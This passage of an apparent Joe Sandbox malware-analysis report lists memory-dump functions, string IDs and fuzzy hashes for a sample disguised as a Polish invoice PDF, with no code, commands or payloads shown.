                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Y$xJ
                                                                                      • API String ID: 0-4263824822
                                                                                      • Opcode ID: d246764046bf42c2b1d21e36dc0bbf648f519c801a9f1b96a331493cad608dd9
                                                                                      • Instruction ID: de93762c76d063a02b0adf47920a1b5080a3fffeea0095d94b564dcc1b78fdfa
                                                                                      • Opcode Fuzzy Hash: d246764046bf42c2b1d21e36dc0bbf648f519c801a9f1b96a331493cad608dd9
                                                                                      • Instruction Fuzzy Hash: F5411CB1D046188BDBA9CF6AC84079DB6F6BB89300F14D1A9D50CEB314DB345E95CF54
                                                                                      Function 065C0040 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $8
                                                                                      • API String ID: 0-518440650
                                                                                      • Opcode ID: 8e8d3ca07ce83ccd88945ab62e01b9eb2085e002dfaba257e02668f14a7bedd1
                                                                                      • Instruction ID: c139f366800289882d0c712eb7cf3f9512e1d4e86bafea0c10c0b6aa6c3595a2
                                                                                      • Opcode Fuzzy Hash: 8e8d3ca07ce83ccd88945ab62e01b9eb2085e002dfaba257e02668f14a7bedd1
                                                                                      • Instruction Fuzzy Hash: 63216471D05A58CBEB58CFAB8D042DEFBF7AFC9310F14C1AA8409BA254DB7549868E50
                                                                                      Function 0676A0F8 Relevance: 1.9, Strings: 1, Instructions: 608COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq
                                                                                      • API String ID: 0-1062398946
                                                                                      • Opcode ID: b390866344217f22d52807d077961968c5b8bddf1c920d137debf01b1c9d6a9b
                                                                                      • Instruction ID: 9d3acaeb2d2c343a1221aadeae2775b3ead6442fed39d02bfbd5909e14c02738
                                                                                      • Opcode Fuzzy Hash: b390866344217f22d52807d077961968c5b8bddf1c920d137debf01b1c9d6a9b
                                                                                      • Instruction Fuzzy Hash: 8B326974B002159FCB88DF6AC49467EFBF2FB88310F148529E95AE7351DB30A945CB91
                                                                                      Function 06758CC6 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222189418.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6750000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 39a5c72a3a27c103eeb03f43b787b3865ee7be845833f052e63967e1319dc47b
                                                                                      • Instruction ID: fa25b9a3c1976cb319e8369f2fd9fa7b7baccd27c76f45db3a2ba761d3c04dc2
                                                                                      • Opcode Fuzzy Hash: 39a5c72a3a27c103eeb03f43b787b3865ee7be845833f052e63967e1319dc47b
                                                                                      • Instruction Fuzzy Hash: D1D1F370A05228CFDBA4DF14D944BA9B7B2FB8A304F2180EAD90DA7355CB759E81CF41
                                                                                      Function 06753601 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222189418.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6750000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: de99e76bf8a39780ee4b0070169afbf6968031aa4951af2a26f53955b347585b
                                                                                      • Instruction ID: b2afa1a17ecc8d4336020d5bf7b6a706def66e330c91283ecb7783f626de6b76
                                                                                      • Opcode Fuzzy Hash: de99e76bf8a39780ee4b0070169afbf6968031aa4951af2a26f53955b347585b
                                                                                      • Instruction Fuzzy Hash: A3913770E05218CFEB94DFA9D488BADBBF2FB4A314F1190A9D818A7355EB745981CF10
                                                                                      Function 06753610 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222189418.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6750000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: ee901f4eb60e02fb1a2896ce122ba08baf55b676d47fb5c6970376a8b3a171d3
                                                                                      • Instruction ID: 5d3f2cb9d887544acf6835798c588cc40d2ff4a3de1bee906adf10cdd66b587b
                                                                                      • Opcode Fuzzy Hash: ee901f4eb60e02fb1a2896ce122ba08baf55b676d47fb5c6970376a8b3a171d3
                                                                                      • Instruction Fuzzy Hash: D2914770E05218CFEB94DFA9D488BADBBF1FB4A314F1190A9D818A3355EB745981CF10
                                                                                      Function 069A0040 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 641d11029e63fc3e1c40df8c15952e9d87b550e73ab9011b6cf7579d7c948f3e
                                                                                      • Instruction ID: 74226d902f69747a0c3ed6637f1d036c66e1b68cb2c1594da3f41510780d9125
                                                                                      • Opcode Fuzzy Hash: 641d11029e63fc3e1c40df8c15952e9d87b550e73ab9011b6cf7579d7c948f3e
                                                                                      • Instruction Fuzzy Hash: B671E774E052288FDB68DF2AD8546D9BBF6FB89304F1080EAD419A7345EB705E85CF50
                                                                                      Function 0676DAD9 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: cdb22c4936a6484470c9277a1c81d84b7e8beb56fb34f2dfcfb9fd28864a4687
                                                                                      • Instruction ID: 5433da0bd042eff2a3476a42e326e60f606a4d4a377821ee9ed4f867dfe4fc09
                                                                                      • Opcode Fuzzy Hash: cdb22c4936a6484470c9277a1c81d84b7e8beb56fb34f2dfcfb9fd28864a4687
                                                                                      • Instruction Fuzzy Hash: 22514670E15218CFDB60DFAAE848BEDBBB2FF89300F14912AE809A7248D7745945CF54
                                                                                      Function 0676DAE8 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 55f63333c749d86404f32024b5e64d3f52fd2d203fc56b1d51371244a041a8b6
                                                                                      • Instruction ID: 6dde49c87c7959ad3528a4ec404f28485d913e9c25967a34cfcdd0cf7253c682
                                                                                      • Opcode Fuzzy Hash: 55f63333c749d86404f32024b5e64d3f52fd2d203fc56b1d51371244a041a8b6
                                                                                      • Instruction Fuzzy Hash: 86512770E15218CFDB60DFAAE848BEDBBB2FF49300F149129E809A7249C7745945CF54
                                                                                      Function 065C1540 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: pqI
                                                                                      • API String ID: 0-1078129942
                                                                                      • Opcode ID: 5f099d6e9f23866280f8cac4ed06aa7210cc77b48fd887a46a4c09dde3ffa0eb
                                                                                      • Instruction ID: 5e5cf53ccfabc8f122df3b6c7270e46416e36ddc6f224559ffc12d9db6ee2262
                                                                                      • Opcode Fuzzy Hash: 5f099d6e9f23866280f8cac4ed06aa7210cc77b48fd887a46a4c09dde3ffa0eb
                                                                                      • Instruction Fuzzy Hash: 27414FB0E05A0ACFDB94CFE9C4402AEB7F1BB48250F588969C416E7711E7388A42CF90
                                                                                      Function 065C1532 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: pqI
                                                                                      • API String ID: 0-1078129942
                                                                                      • Opcode ID: 7197c90a23b32e2322871ac564ebd0a0528ade187e884fa71d115fffa8ae57c0
                                                                                      • Instruction ID: b9a2605f5f1f1f5fbdf839f060621ffa65a5045bf9bdc66bf42a7f27db0583ce
                                                                                      • Opcode Fuzzy Hash: 7197c90a23b32e2322871ac564ebd0a0528ade187e884fa71d115fffa8ae57c0
                                                                                      • Instruction Fuzzy Hash: D7415070E05A0A9FDB90CFE9C5406AEB7F5BB48250F588969D426E7711E338CA42CF90
                                                                                      Function 065C0006 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: dfabb0278034219d9f78ea3d22aac9a63429a4f3ec318e3d6151639ee5fbe61f
                                                                                      • Instruction ID: 5fcce1685ca10f9df9aebb2379c186dd3165fb73337a43485b97c5522f59be73
                                                                                      • Opcode Fuzzy Hash: dfabb0278034219d9f78ea3d22aac9a63429a4f3ec318e3d6151639ee5fbe61f
                                                                                      • Instruction Fuzzy Hash: 15314E71D057549FD719CFA78C005DABFF7AFCA310F08C0AAD448AA265DA350946CF51
                                                                                      Function 066A0006 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Y
                                                                                      • API String ID: 0-3233089245
                                                                                      • Opcode ID: 16a8e2b6e2b6755bb81ed3f5a8d60c5ba44b60f4f34c73397dcafea3b3e57032
                                                                                      • Instruction ID: 75aeddb1e76db6a3f782c05fead02483ce85fdf80404f70747892654a79c0aa7
                                                                                      • Opcode Fuzzy Hash: 16a8e2b6e2b6755bb81ed3f5a8d60c5ba44b60f4f34c73397dcafea3b3e57032
                                                                                      • Instruction Fuzzy Hash: 24315271D097949FD71ACF678C41289BFF7AFC6300F09C0AAD548AB266D6340945CF61
                                                                                      Function 065C4F27 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O
                                                                                      • API String ID: 0-878818188
                                                                                      • Opcode ID: a74848f267adc1f96cac9db272cfe034f7b88e8dce2211ed492d5f4c0d61ea4b
                                                                                      • Instruction ID: 36340ff1e2d144673bf1fb95fe7cd19c7298834424930a5c1e5473c6b328f250
                                                                                      • Opcode Fuzzy Hash: a74848f267adc1f96cac9db272cfe034f7b88e8dce2211ed492d5f4c0d61ea4b
                                                                                      • Instruction Fuzzy Hash: F2113C71D056089FEB48CFABD8416DEFFF7AFC9210F04C07AD508AA255EB3445468BA1
                                                                                      Function 06507968 Relevance: .4, Instructions: 431COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2bc7344099b898711f6eeecf5abcf7e4ac8d722cb590abe353f3d470f1b68aee
                                                                                      • Instruction ID: 9dd05634d4334a484da72ed4984437e9cb6dd9a61665cdc5e543cb7466316224
                                                                                      • Opcode Fuzzy Hash: 2bc7344099b898711f6eeecf5abcf7e4ac8d722cb590abe353f3d470f1b68aee
                                                                                      • Instruction Fuzzy Hash: C312C471E046198FDB54CFAAC98069EFBF2FF88304F24C569D418AB259D734A986CF50
                                                                                      Function 065C8EB0 Relevance: .2, Instructions: 183COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4d4a605c2b42ddf4ac5123a3f0cf56530ae9aa857afcde39e066dc092bef0960
                                                                                      • Instruction ID: a605fbafae01d17c6ae19d4bd1812b0ad05f15014d57b9812403f7ba31895ce5
                                                                                      • Opcode Fuzzy Hash: 4d4a605c2b42ddf4ac5123a3f0cf56530ae9aa857afcde39e066dc092bef0960
                                                                                      • Instruction Fuzzy Hash: 9071FD70D05208CFEB84DFE9C544AEEBBF2BB89321F10956AD819A3240D3745985CFA4
                                                                                      Function 065C8EA0 Relevance: .2, Instructions: 182COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d9bf343332838a4f8f6c2ae708e94c90647393aacade95ce17d52eeef700af5
                                                                                      • Instruction ID: 4824df609ddaadd8114cb08b32052e0366bf038534a187f3583e5fa53444bd18
                                                                                      • Opcode Fuzzy Hash: 6d9bf343332838a4f8f6c2ae708e94c90647393aacade95ce17d52eeef700af5
                                                                                      • Instruction Fuzzy Hash: 54710FB0D06208CFEB84DFE9C544BEEBBF2BB89320F10956AD815A7240C7755985CFA4
                                                                                      Function 0650795A Relevance: .1, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aab1bb9e070fc840f688c1d480e81cfdfd898b571943f74331ad0a28045d6dc1
                                                                                      • Instruction ID: a035aca56bb88cf482252534e19a7bba982cc54cea8f73127f2a2ee08400a291
                                                                                      • Opcode Fuzzy Hash: aab1bb9e070fc840f688c1d480e81cfdfd898b571943f74331ad0a28045d6dc1
                                                                                      • Instruction Fuzzy Hash: 144158B1E016199BEB18CFABC94059EFBF3BFC8300F14C06AD958AB264DA3459458F54
                                                                                      Function 00D7370A Relevance: .1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c7e1cf44abcfa4bc49275cea47c8d3ef312a16dcd84cc4e3c1280867ae379c02
                                                                                      • Instruction ID: 2c3ee11330438872ce1a91b97bbcdcd42cc6b8922c5668086eb5d7eada9ff39c
                                                                                      • Opcode Fuzzy Hash: c7e1cf44abcfa4bc49275cea47c8d3ef312a16dcd84cc4e3c1280867ae379c02
                                                                                      • Instruction Fuzzy Hash: 24515071D056588BEB68CF2B8D446CAFAF7AFC9300F04C1FA984CA6255EB700AC58F11
                                                                                      Function 068E37FF Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f73ced257a2ecde37292c390577ceb06d279f356551b3cfde9eab43717b9e72d
                                                                                      • Instruction ID: c827f99444f10870538b7c7934953fd2213081c756c9b3391bd0712e0f0733af
                                                                                      • Opcode Fuzzy Hash: f73ced257a2ecde37292c390577ceb06d279f356551b3cfde9eab43717b9e72d
                                                                                      • Instruction Fuzzy Hash: E741B571D056288FEB68CFAAC84479EBBF2AF89300F14C0AA8408E7255DB745D85CF50
                                                                                      Function 06508021 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4abf9e91f548f4ee73941b5a6fd98459ef556d91253d2e9307983e57e735c0dc
                                                                                      • Instruction ID: 5edfdd7aae5fb798b3f9871c5957704c9f01fb0505346a56fd1ae96c7af61071
                                                                                      • Opcode Fuzzy Hash: 4abf9e91f548f4ee73941b5a6fd98459ef556d91253d2e9307983e57e735c0dc
                                                                                      • Instruction Fuzzy Hash: D14153B1D05A588BEB5CCF6B8C4069AFAF7AFC8301F54C5B9841CAB265EB3049468F51
                                                                                      Function 068E3810 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e94097cf4bd1d0499341917220047af33985f8d1c42a308efe1fcdcb3aedc08
                                                                                      • Instruction ID: fdcf19363c3400ce638abdabd6443db0ded07ac5f22083dfb4573863444e5e99
                                                                                      • Opcode Fuzzy Hash: 3e94097cf4bd1d0499341917220047af33985f8d1c42a308efe1fcdcb3aedc08
                                                                                      • Instruction Fuzzy Hash: AB41A470D45628CFEB68CFAAC8447AEBBF6AF89304F14C0AA8409E7254DB745D85CF50
                                                                                      Function 06501890 Relevance: .1, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f8f475e5c1b5f5463bda69286f7deef996ae3b9dbfcfcba641e08bc5647610c3
                                                                                      • Instruction ID: 59facef47ac41829d95729ebfa03279d72c02602e7270ddd9dbf3b47e20d22c0
                                                                                      • Opcode Fuzzy Hash: f8f475e5c1b5f5463bda69286f7deef996ae3b9dbfcfcba641e08bc5647610c3
                                                                                      • Instruction Fuzzy Hash: 2031CCB1D046188BEB6DCF6BD84069EFAFBBFC8300F04D0BA9518B6255DB704A818F55
                                                                                      Function 0650187F Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7abfa7b4d9cff75305a202d733d5268ea2efab631e0baa2f3f9044d2ba38aed0
                                                                                      • Instruction ID: cf087944fe106583db1d3b09d019db0a1fbcd6066805419f140c331e7c7fa86d
                                                                                      • Opcode Fuzzy Hash: 7abfa7b4d9cff75305a202d733d5268ea2efab631e0baa2f3f9044d2ba38aed0
                                                                                      • Instruction Fuzzy Hash: 5F31DFB1D056598BEB2DCF6B9C4069AFAFBAFC8300F04D4FAD41CA6255DB700A858F51
                                                                                      Function 069A0006 Relevance: .1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14c1aeffcd51874aaa6e55f5b4ad482d2a8a2e89c00eed5dfc82ffcc9c7fa7e1
                                                                                      • Instruction ID: 0e05975c7d010809b0082b5a0aeee55b0cf6c44d9c877de28b2de3bdb7aa5426
                                                                                      • Opcode Fuzzy Hash: 14c1aeffcd51874aaa6e55f5b4ad482d2a8a2e89c00eed5dfc82ffcc9c7fa7e1
                                                                                      • Instruction Fuzzy Hash: 2E315E71D0A7588BE729CF678C1869AFBF6AFC9304F04C0EAD458A7255DB300985DF51
                                                                                      Function 06492339 Relevance: .1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f9038d3d6d1b7633cbbb9b4c7cc39e2cf6e0ba87e24aa47912dce737cdb6103
                                                                                      • Instruction ID: b8900f98bc66716bbcea7b8fe98a8e4c3b3a3105d04963d78f0971ffdae03166
                                                                                      • Opcode Fuzzy Hash: 2f9038d3d6d1b7633cbbb9b4c7cc39e2cf6e0ba87e24aa47912dce737cdb6103
                                                                                      • Instruction Fuzzy Hash: 58318AB1D016189BEB68CF6BCD4578AFAF6BFC9300F14C1AAD44CA6254EB740A858F51
                                                                                      Function 0649E015 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8277d5259937ecfa8df25716682fdd9c5a8b015c70537b3185b4e1969e6e5834
                                                                                      • Instruction ID: 08f5a4e6476d7a8176c3e7baa8f56abd9642c88fe0f00edacae648361b6cf5ad
                                                                                      • Opcode Fuzzy Hash: 8277d5259937ecfa8df25716682fdd9c5a8b015c70537b3185b4e1969e6e5834
                                                                                      • Instruction Fuzzy Hash: FA21FC71D056689BEB59CF6B8D406DAFBF7AFC9300F04C0BAD448AA255DA300A95CF54
                                                                                      Function 06751A00 Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222189418.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6750000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 36e786477a6058242502c6d9a1d9215bbea9a48a2269f2e779a1dd94c9a7d124
                                                                                      • Instruction ID: 90166e5e51ad2f8ba080257404ba2bb25304d9b03eac1ce4dd7af7556a8a8d7d
                                                                                      • Opcode Fuzzy Hash: 36e786477a6058242502c6d9a1d9215bbea9a48a2269f2e779a1dd94c9a7d124
                                                                                      • Instruction Fuzzy Hash: CD21D5B1D056188BEB18CF9BD9447DDFBF7AFC8300F14C0AAD909A6254DB750A468F40
                                                                                      Function 067519F0 Relevance: .1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
